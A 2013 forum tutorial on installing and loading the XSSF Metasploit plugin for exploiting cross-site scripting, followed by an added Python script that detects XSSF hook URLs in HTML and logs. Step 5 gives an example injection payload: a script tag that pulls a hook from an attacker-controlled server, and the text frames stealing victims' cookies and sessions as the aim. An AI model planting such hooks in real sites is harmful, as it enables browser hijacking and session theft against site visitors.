Underc0de

[In]Seguridad Informática => Bugs y Exploits => Topic started by: Mayk0 on June 15, 2013, 02:52:51 PM

Title: Xssf Metasploit Plugin
Posted by: Mayk0 on June 15, 2013, 02:52:51 PM
http://www.youtube.com/watch?v=soNCw0FnPVU


[ Install XSSF metasploit plugin ]
'this tutorial will focus on installing/using xssf on kali-linux distros'

(http://www.thriftstorehacker.com/2012/october/xssf-web-console.png)

Description:
The Cross-Site Scripting Framework (XSSF) is a security tool designed to make the XSS vulnerability exploitation
task much easier. XSSF allows creating a communication channel with the targeted browser
(from an XSS vulnerability) in order to perform further attacks. Its integration into the Metasploit Framework
allows users to launch MSF browser-based exploits easily from an XSS vulnerability. In addition, an interesting
thought when exploiting an XSS inside a victim's browser could be to browse the website in the attacker's browser,
using the connected victim's session. In most cases, simply stealing the victim's cookie will be sufficient
to carry out this action... 'this tool requires metasploit installed to work'




Installation instructions:
1 - Download the latest Metasploit Framework (MSF) release
2 - Update Ruby to 1.9 if not already done
3 - Open a terminal and navigate to the [ /opt/metasploit/../msf3 ] folder
4 - Download XSSF from its SVN repository
[ svn export http://xssf.googlecode.com/svn/trunk ./ --force ]


XSSF plugin loading instructions:
1 - Start Metasploit Framework (MSF Console for example)
2 - Load XSSF plugin using the command 'load xssf'
3 - XSSF server port can be modified using the command 'load xssf Port=80'
4 - XSSF server URI can be changed using the command 'load xssf Uri=/'
5 - Example of XSS Attack: <script src="http://IP-Server-MSF:Port/loop?interval=5"></script>


XSSF home:
[ https://code.google.com/p/xssf/ ]
Source Code:
[ https://code.google.com/p/xssf/source/browse/trunk/modules/?r=5#modules%2Fauxiliary%2Fxssf ]
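
For defenders, the hook in step 5 has a recognizable shape: a script tag whose source ends in /loop and carries a numeric interval parameter, possibly behind a path prefix when the Uri option is changed. The Python below is an added example, not part of the original post or of XSSF; it flags that shape in stored or served HTML and in proxy logs. The log line format, the sample data and all function names are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs


def is_xssf_loop_url(url):
    """True if url has the shape of the hook in step 5: <base>/loop?interval=N."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:  # malformed URL, e.g. an unclosed '[' in the host
        return False
    # 'load xssf Uri=...' can put a prefix before 'loop', so only the
    # last path segment is compared.
    if parts.path.rsplit("/", 1)[-1].lower() != "loop":
        return False
    return any(v.isdigit() for v in parse_qs(parts.query).get("interval", []))


class _ScriptSrcCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag == "script":
            self.sources += [v for k, v in attrs if k == "src" and v]


def find_hooks_in_html(html):
    """Return script sources in stored or served HTML that match the hook."""
    collector = _ScriptSrcCollector()
    collector.feed(html)
    return [src for src in collector.sources if is_xssf_loop_url(src)]


def find_hooks_in_log(lines):
    """Return (client, url) pairs; assumed line format: '<client> <method> <url>'."""
    rows = (line.split() for line in lines)
    return [(r[0], r[2]) for r in rows if len(r) >= 3 and is_xssf_loop_url(r[2])]


# Constructed sample data, not taken from a real system.
SAMPLE_HTML = ('<p>hi</p><script src="https://cdn.example.com/js/app.js"></script>'
               '<SCRIPT SRC="http://192.0.2.10:8888/loop?interval=5"></SCRIPT>')
SAMPLE_LOG = [
    "10.0.0.7 GET http://192.0.2.10:8888/loop?interval=5",
    "10.0.0.7 GET https://intranet.example.com/app/loop.js?interval=5",
    "10.0.0.9 GET http://198.51.100.4/x/loop?interval=2",
]
```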